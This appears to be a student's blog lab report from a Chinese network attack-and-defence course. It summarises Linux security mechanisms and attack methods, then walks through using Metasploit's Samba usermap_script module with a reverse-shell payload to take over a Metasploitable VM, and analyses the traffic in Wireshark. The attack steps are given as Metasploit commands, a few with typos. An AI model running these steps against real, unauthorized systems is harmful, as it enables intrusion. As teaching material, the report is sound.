20211920 2021-2022-2 《网络攻防实践》实践七报告

1.实践内容

1.1Linux的系统结构

Linux的系统结构内核的总体结构如下图:

1.2Linux操作系统安全机制

Linux身份认证机制:Linux用户、linux用户组、Linux的本地登陆用户认证机制、Linux的远程登陆用户认证机制、Linux的统一身份认证中间件-PAM。
Linux授权与访问控制机制:文件所有者、文件的访问权限、文件的特殊执行权限、Linux访问机制的不足及改进。
Linux安全审计机制:连接时间日志、进程控制日志、错误日志记录。

1.3Linux系统远程攻防技术

主要方法
对Linux系统各种网络服务的身份认证过程所涉及的用户口令字进行猜测攻击
发掘Linux系统某个监听网络服务的安全漏洞并进行利用,从而为攻击者提供本地Shell的访问权
通过网页木马、发送欺诈邮件、提供特洛伊木马程序等技术和社会工程学手段
在Linux系统作为连接多个网络的路由器,或者打开“混杂模式”实施网络嗅探的监听器时,可能遭受攻击者特意构造的数据包攻击,从而被攻击者取得访问权。
防范措施
禁用所有不必要的网络服务
尽量选择更安全的网络协议与服务软件,并使用最佳安全实践进行部署
及时更新网络服务版本
使用xinetd、防火墙为Linux网络服务添加网络访问控制机制
建立入侵检测与应急响应计划流程

1.4Linux系统本地安全攻防技术

Linux本地特权提升
破解出Root用户的口令,然后执行su或sudo命令进行提升
发掘并利用su或sudo程序中的漏洞
攻击用户态SUID特权提升漏洞
攻击Linux内核代码特权提升漏洞
从系统中搜索全局可写的敏感文件与目录位置并加以利用

2.实践过程

机器 IP地址
kali 192.168.160.130
met_ubuntu 192.168.160.131

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。
1.首先Ping通met_ubuntu

1.通过命令msfconsole启动渗透软件,通过命令use exploir/multi/usermap_script使用渗透攻击模块,然后show options

2.通过show payloads查看与该渗透攻击模块相兼容的攻击载荷

3.然后通过命令set payload cmd/unix/reverse设置攻击载荷。使用set RHOST 192.168.160.131表示设置靶机IP地址,然后执行exploit开始攻击

4.通过命令whomai查看当前权限账户

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
1.首先使用nmap -sV 192.168.160.131扫描靶机,查看开放的端口,及端口上程序的版本

2.在msfconsole中首先使用search samba看看smb服务中的漏洞

使用 use /samba/usermap_script进行渗透攻击

通过wireshark分析,用wireshark抓包,可看到攻击为192.168.160.130,靶机192.168.160.131

查看最后一个TCP数据包能看到获取到靶机权限后输入的命令

3.学习中遇到的问题及解决

问题1:exploit后没有像上次实验一样明显进入shell,以为是虚机问题。
问题1解决方案:直接输入命令就可以了

4.学习感想和体会

本次实验是对Linux系统进行,更深入的了解对Linux系统的各种攻击。

posted @ 2022-04-30 16:57  张婷20211920  阅读(38)  评论(0编辑  收藏  举报